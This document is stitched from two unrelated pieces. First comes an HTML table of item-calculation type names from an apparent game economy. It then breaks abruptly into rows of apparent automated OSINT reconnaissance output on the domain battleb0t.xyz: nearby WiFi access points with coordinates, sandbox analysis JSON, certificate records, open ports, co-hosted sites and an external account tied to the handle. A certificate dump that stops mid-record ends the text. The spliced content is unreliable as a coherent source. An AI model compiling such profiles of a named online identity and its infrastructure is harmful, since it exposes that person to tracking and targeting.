<p>Types that are used to describe an item's calculation</p>
<table>
<thead>
<tr>
<th>Type</th>
</tr>
</thead>
<tbody>
<tr>
<td>essence</td>
</tr>
<tr>
<td>prestige</td>
</tr>
<tr>
<td>shens_auction</td>
</tr>
<tr>
<td>winning_bid</td>
</tr>
<tr>
<td>enchant</td>
</tr>
<tr>
<td>silex</td>
</tr>
<tr>
<td>wood_singularity</td>
</tr>
<tr>
<td>tuned_transmission</td>
</tr>
<tr>
<td>thunder_charge</td>
</tr>
<tr>
<td>rune</td>
</tr>
<tr>
<td>fuming_potato_book</td>
</tr>
<tr>
<td>hot_potato_book</td>
</tr>
<tr>
<td>dye</td>
</tr>
<tr>
<td>the_art_of_war</td>
</tr>
<tr>
<td>the_art_of_peace</td>
</tr>
<tr>
<td>farming_for_dummies</td>
</tr>
<tr>
<td>recombobulator_3000</td>
</tr>
<tr>
<td>gemstone</td>
</tr>
<tr>
<td>reforge</td>
</tr>
<tr>
<td>master_star</td>
</tr>
<tr>
<td>necron_scroll</td>
</tr>
<tr>
<td>gemstone_chamber</td>
</tr>
<tr>
<td>drill_part</td>
</tr>
<tr>
<td>etherwarp_conduit</td>
</tr>
<tr>
<td>pet_item</td>
</tr>
|
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Wir (Net ID: 00:01:E3:51:05:D5) | 50.1188, 8.6843 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | wireless (Net ID: 00:01:36:07:50:41) | 52.3759, 4.8975 |
| 2023-05-12 02:58:34 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://texassuntexasmoon.com/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_dd8_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_dd8_IESQMMUTEX_0_519"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_dd8_IESQMMUTEX_0_303"\n "IsoScope_dd8_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3544"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_dd8_ConnHashTable<3544>_HashTable_Mutex"\n "IsoScope_dd8_IE_EarlyTabStart_0xf18_Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "UpdatingNewTabPageData"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"texassuntexasmoon.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"texassuntexasmoon.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarDD29.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.74.170.74:80"\n "34.74.170.74:443"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-127', u'name': u'Found user-agent related strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: texassuntexasmoon.com" (Indicator: "mozilla/5.0 (")\n "GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: texassuntexasmoon.com" (Indicator: "user-agent: ")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"CabDD18.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62919 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62919 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "ZR04WK0P.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\ZR04WK0P.txt]- [targetUID: 00000000-00003544]\n Dropped file: "QMOFOY6E.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\QMOFOY6E.txt]- [targetUID: 00000000-00003544]\n Dropped file: "2CHG6PLE.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\2CHG6PLE.txt]- [targetUID: 00000000-00003544]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "urlref_httptexassuntexasmoon.com" has type "HTML document ASCII text with very long lines"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002684]\n "ZR04WK0P.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\ZR04WK0P.txt]- [targetUID: 00000000-00003544]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "CabDD18.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62919 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabDD18.tmp]- [targetUID: 00000000-00002684]\n "QMOFOY6E.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\QMOFOY6E.txt]- [targetUID: 00000000-00003544]\n "2CHG6PLE.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\2CHG6PLE.txt]- [targetUID: 00000000-00003544]\n "NSPIFVH3.txt" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\37NU00GP\\NSPIFVH3.txt]- [targetUID: 00000000-00002684]\n "NewErrorPageTemplate_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "~DFE4194B9B6BD734DD.TMP" has type "data"- Location: [%TEMP%\\~DFE4194B9B6BD734DD.TMP]- [targetUID: 00000000-00003544]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "_6C8601C4-5EA4-11ED-B0C0-080027B94385_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._61F8B973-5EA4-11ED-B0C0-080027B94385_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DFF8E353882B4B5390.TMP" has type "data"- Location: [%TEMP%\\~DFF8E353882B4B5390.TMP]- [targetUID: 00000000-00003544]\n "~DF0028BFD212D71DC5.TMP" has type "data"- Location: [%TEMP%\\~DF0028BFD212D71DC5.TMP]- [targetUID: 00000000-00003544]\n "_61F8B975-5EA4-11ED-B0C0-080027B94385_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003544]\n "~DFC34CEF82F4E6D534.TMP" has type "data"- Location: [%TEMP%\\~DFC34CEF82F4E6D534.TMP]- [targetUID: 00000000-00003544]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: texassuntexasmoon.com"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://texassuntexasmoon.com/"\n Pattern match: "http://texassuntexasmoon.com"\n Heuristic match: "texassuntexasmoon.com"\n Heuristic match: "GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: texassuntexasmoon.com"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/93 Antivirus vendors marked sample as malicious (0% detection rate)'}], u'threat_level': 0, u'size': None, u'job_id': u'63691cbfbd04344cc75ae66e', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': {u'attck | 34.74.170.74 |
| 2023-05-12 02:55:05 | Netblock Membership | No | Censys | 334 | 0 | 2 | 0 | None | 188.114.97.0/24 | 188.114.97.1 |
| 2023-05-12 02:54:03 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["7c575ea9e94610e1-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 172.67.135.9 |
| 2023-05-12 03:03:16 | Internet Name - Unresolved | No | DNS Resolver | 0 | 0 | 2 | 0 | None | webdisk.ayhu.xyz | [{u'not_after': u'2023-07-10T04:54:49', u'not_before': u'2023-04-11T04:54:50', u'issuer_ca_id': 180753, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.ayhu.xyz', u'serial_number': u'0d408dd97ca1bd4c0d06c53fc3e92ebc', u'entry_timestamp': u'2023-04-11T05:54:51.221', u'id': 9117673170}, {u'not_after': u'2023-05-12T05:22:09', u'not_before': u'2023-02-11T05:22:10', u'issuer_ca_id': 180753, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.ayhu.xyz', u'serial_number': u'0ce3f41ce8cbbbcf13f76c6f365ec2eb', u'entry_timestamp': u'2023-02-11T06:22:11.299', u'id': 8627857885}, {u'not_after': u'2023-03-14T04:12:31', u'not_before': u'2022-12-14T04:12:32', u'issuer_ca_id': 183283, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0310b430a3e0722fec4ebc95e312bb838d6f', u'entry_timestamp': u'2022-12-14T05:12:32.333', u'id': 8209207679}, {u'not_after': u'2023-03-14T04:12:31', u'not_before': u'2022-12-14T04:12:32', u'issuer_ca_id': 183283, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0310b430a3e0722fec4ebc95e312bb838d6f', u'entry_timestamp': u'2022-12-14T05:12:32.07', u'id': 8196466589}, {u'not_after': u'2023-03-14T04:12:06', u'not_before': u'2022-12-14T04:12:07', u'issuer_ca_id': 180753, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.ayhu.xyz', u'serial_number': u'00ff0e1ea46f55f0740eb383e107c9ea93', u'entry_timestamp': u'2022-12-14T05:12:08.377', u'id': 8196466213}, {u'not_after': u'2023-03-14T03:53:53', u'not_before': u'2022-12-14T03:53:54', u'issuer_ca_id': 183267, u'name_value': u'ayhu.xyz\ncpanel.ayhu.xyz\ncpcalendars.ayhu.xyz\ncpcontacts.ayhu.xyz\nmail.ayhu.xyz\nwebdisk.ayhu.xyz\nwebmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'04897c23d88920d1c5b3ae3091443a2381b8', u'entry_timestamp': u'2022-12-14T04:53:55.433', u'id': 8209126729}, {u'not_after': u'2023-03-14T03:53:53', u'not_before': u'2022-12-14T03:53:54', u'issuer_ca_id': 183267, u'name_value': u'ayhu.xyz\ncpanel.ayhu.xyz\ncpcalendars.ayhu.xyz\ncpcontacts.ayhu.xyz\nmail.ayhu.xyz\nwebdisk.ayhu.xyz\nwebmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'04897c23d88920d1c5b3ae3091443a2381b8', u'entry_timestamp': u'2022-12-14T04:53:54.573', u'id': 8196005223}, {u'not_after': u'2023-03-13T19:16:53', u'not_before': u'2022-12-13T19:16:54', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0488a73cdb484e7a5b3055608f2320348b3f', u'entry_timestamp': u'2022-12-13T20:16:55.143', u'id': 8206782905}, {u'not_after': u'2023-03-13T19:16:53', u'not_before': u'2022-12-13T19:16:54', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0488a73cdb484e7a5b3055608f2320348b3f', u'entry_timestamp': u'2022-12-13T20:16:54.437', u'id': 8193169403}, {u'not_after': u'2023-03-13T18:07:06', u'not_before': u'2022-12-13T18:07:07', u'issuer_ca_id': 183267, u'name_value': u'ayhu.xyz\nmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'047ba367f476b8d086bdaa81687c78c65324', u'entry_timestamp': u'2022-12-13T19:07:08.931', u'id': 8206381262}, {u'not_after': u'2023-03-13T18:07:06', u'not_before': u'2022-12-13T18:07:07', u'issuer_ca_id': 183267, u'name_value': u'ayhu.xyz\nmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'047ba367f476b8d086bdaa81687c78c65324', u'entry_timestamp': u'2022-12-13T19:07:08.083', u'id': 8192906588}, {u'not_after': u'2023-03-13T17:51:42', u'not_before': u'2022-12-13T17:51:43', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0318ae067efc0b78465c8bfe1a31bf5b16b8', u'entry_timestamp': u'2022-12-13T18:51:43.988', u'id': 8206326761}, {u'not_after': u'2023-03-13T17:51:42', u'not_before': u'2022-12-13T17:51:43', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0318ae067efc0b78465c8bfe1a31bf5b16b8', u'entry_timestamp': u'2022-12-13T18:51:43.756', u'id': 8193180831}] |
| 2023-05-12 03:00:53 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 001wwang.github.io | 185.199.111.153 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Rock Chalk (Net ID: 00:01:95:08:D8:04) | 37.780462,-122.390564 |
| 2023-05-12 03:09:42 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 118.97.148.34.bc.googleusercontent.com | 34.148.97.118 |
| 2023-05-12 02:44:23 | SSL Certificate - Issued by | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | C=US,O=DigiCert Inc,CN=DigiCert TLS RSA SHA256 2020 CA1 | 185.199.109.153 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 2 | 0 | None | cf-mitigated: challenge | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=WwRFDMWv1i%2FLL8I%2BSQXrEl8P6VG5M1GGitMkpd4FkAGmtOdqQDCLc17nGzjDcmqZpet%2BvxBX8CUcOAv3alTgafYDwFhVZzoAKiiOmj1uFX8dLMhZ1ZA2lQdL%2FA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60363a5a178c-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:01:22 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.205): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:22:23 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Pronouns.Page (Category: social)
https://pronouns.page/api/profile/get/battleb0t?version=2 | battleb0t |
| 2023-05-12 02:46:49 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | netlify.app | 35.229.48.116 |
| 2023-05-12 02:44:29 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | github.io | github.io |
| 2023-05-12 02:45:02 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 2 | 0 | None | {u'region_code': u'CA', u'country_tld': u'.us', u'ip': u'2606:50c0:8002::153', u'currency_name': u'Dollar', u'currency': u'USD', u'country_population': 327167434, u'country_code': u'US', u'timezone': u'America/Los_Angeles', u'city': u'San Francisco', u'network': u'2606:50c0::/32', u'languages': u'en-US,es-US,haw,fr', u'version': u'IPv6', u'latitude': 37.7809, u'in_eu': False, u'utc_offset': u'-0700', u'continent_code': u'NA', u'country_name': u'United States', u'country_capital': u'Washington', u'org': u'FASTLY', u'postal': u'94142', u'asn': u'AS54113', u'country': u'US', u'region': u'California', u'longitude': -122.4245, u'country_calling_code': u'+1', u'country_area': 9629091.0, u'country_code_iso3': u'USA'} | 2606:50c0:8002::153 |
| 2023-05-12 02:45:11 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 2 | 0 | None | {u'region_code': u'ON', u'country_tld': u'.ca', u'ip': u'172.67.135.9', u'currency_name': u'Dollar', u'currency': u'CAD', u'country_population': 37058856, u'country_code': u'CA', u'timezone': u'America/Toronto', u'city': u'Toronto', u'network': u'172.67.0.0/16', u'languages': u'en-CA,fr-CA,iu', u'version': u'IPv4', u'latitude': 43.6547, u'in_eu': False, u'utc_offset': u'-0400', u'continent_code': u'NA', u'country_name': u'Canada', u'country_capital': u'Ottawa', u'org': u'CLOUDFLARENET', u'postal': u'M5A', u'asn': u'AS13335', u'country': u'CA', u'region': u'Ontario', u'longitude': -79.3623, u'country_calling_code': u'+1', u'country_area': 9984670.0, u'country_code_iso3': u'CAN'} | 172.67.135.9 |
| 2023-05-12 03:36:20 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.128:80 | 188.114.97.0/24 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Good Times (Net ID: 00:02:2D:29:A2:94) | 34.0544, -118.244 |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | cross-origin-resource-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=fiT%2Fr8CwWrAQPZkt8VpkeQoVoGOR6HuHPRasaTPIcW93tfGJar9pTikOfGdSWQA5SZHUpCyuk56gghqLlY9yU5dVDbV5Bs9yRYYuQ0D9hZe3tyWEFUstq9XRCg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c594cb34339-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:44:26 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | nwapi.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:99:a3:5c:44:13:8f:1f:f4:9f:74:e5:4f:ad:57:81:83:24
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Mar 23 20:32:58 2023 GMT
Not After : Jun 21 20:32:57 2023 GMT
Subject: CN=nwapi.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:ae:2d:9c:62:18:76:2e:df:de:55:f1:95:af:dc:
59:27:38:8b:5b:00:32:90:fa:a3:fe:5e:92:a6:01:
7f:53:a9:14:85:d5:b4:a7:c0:0d:14:f0:32:f0:be:
0c:a5:54:c5:d2:e3:5d:4e:26:e5:3f:0a:13:30:aa:
26:b9:11:a2:a8:7d:58:6c:52:5f:e4:39:4c:64:b8:
92:f5:ca:b5:bf:a9:b0:6c:9f:4b:b2:34:b7:0e:fd:
c3:4b:d1:55:53:7f:36:89:dc:d0:2b:5e:0c:5f:ed:
95:61:3e:cb:10:b6:d2:99:9c:0c:b8:b3:93:24:f5:
c4:4f:20:e2:fc:24:a0:02:4e:dc:94:c0:26:80:c4:
72:7c:f8:8f:0f:bb:1a:71:64:e0:5b:eb:d2:c0:8c:
13:c3:5d:19:05:5c:35:d5:d3:61:05:f7:49:68:ce:
3f:e7:a7:33:6d:02:b1:87:fe:b7:9f:60:b3:8d:a6:
be:5a:d5:5c:ed:53:5e:27:e0:c9:22:2d:81:ce:b1:
ec:cc:05:c4:f7:86:fc:47:61:ca:71:86:20:b8:14:
9c:ca:b1:05:e4:47:06:cb:1b:86:c7:8f:5e:ba:31:
9b:3c:cb:b9:41:b5:56:e8:d6:32:9d:d1:16:19:02:
ad:d1:e3:f1:4b:c1:d9:61:74:ad:de:6b:c8:4b:60:
db:26:73:9c:89:bb:67:5a:18:24:bc:9e:d0:bb:23:
66:66:fc:2a:b7:81:2b:f5:a0:62:f2:00:e6:a6:5d:
1f:6b:36:2c:f3:42:e0:4d:31:63:fd:7c:96:5d:29:
9b:8b:f6:25:a8:26:32:03:a6:81:0f:c9:d4:8e:46:
76:31:9b:db:08:e1:d6:3d:7b:5e:87:9a:98:cf:cb:
5b:13:ec:f0:64:25:74:03:76:57:14:ba:41:4b:d2:
c1:7e:f3:50:47:af:8d:ee:e4:55:19:8e:20:6c:87:
99:ac:39:f3:6e:8a:21:33:3f:07:aa:28:83:d0:d1:
d8:1c:a8:b7:84:a8:89:95:7f:34:41:7f:a0:83:3e:
cf:d0:5c:c5:e2:ac:17:66:44:17:94:26:73:d2:f6:
3b:d0:cf:9b:f2:1b:3c:6e:17:4d:08:5d:87:80:c7:
6c:c8:40:f5:84:96:5d:f8:9c:bd:ce:4d:4b:f5:0e:
4f:4e:80:4c:0a:a9:22:bf:2e:2d:84:af:ae:ae:d4:
1a:50:8f:be:bf:51:48:e8:9e:33:86:ab:75:90:6e:
5e:7e:85:12:ca:44:de:1a:66:b7:86:cb:c7:c1:40:
7b:6e:f8:ff:44:74:04:48:b1:d2:5b:44:5f:fc:71:
68:46:d9:68:ed:ca:a6:15:15:a5:57:56:d1:00:94:
83:4a:61
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
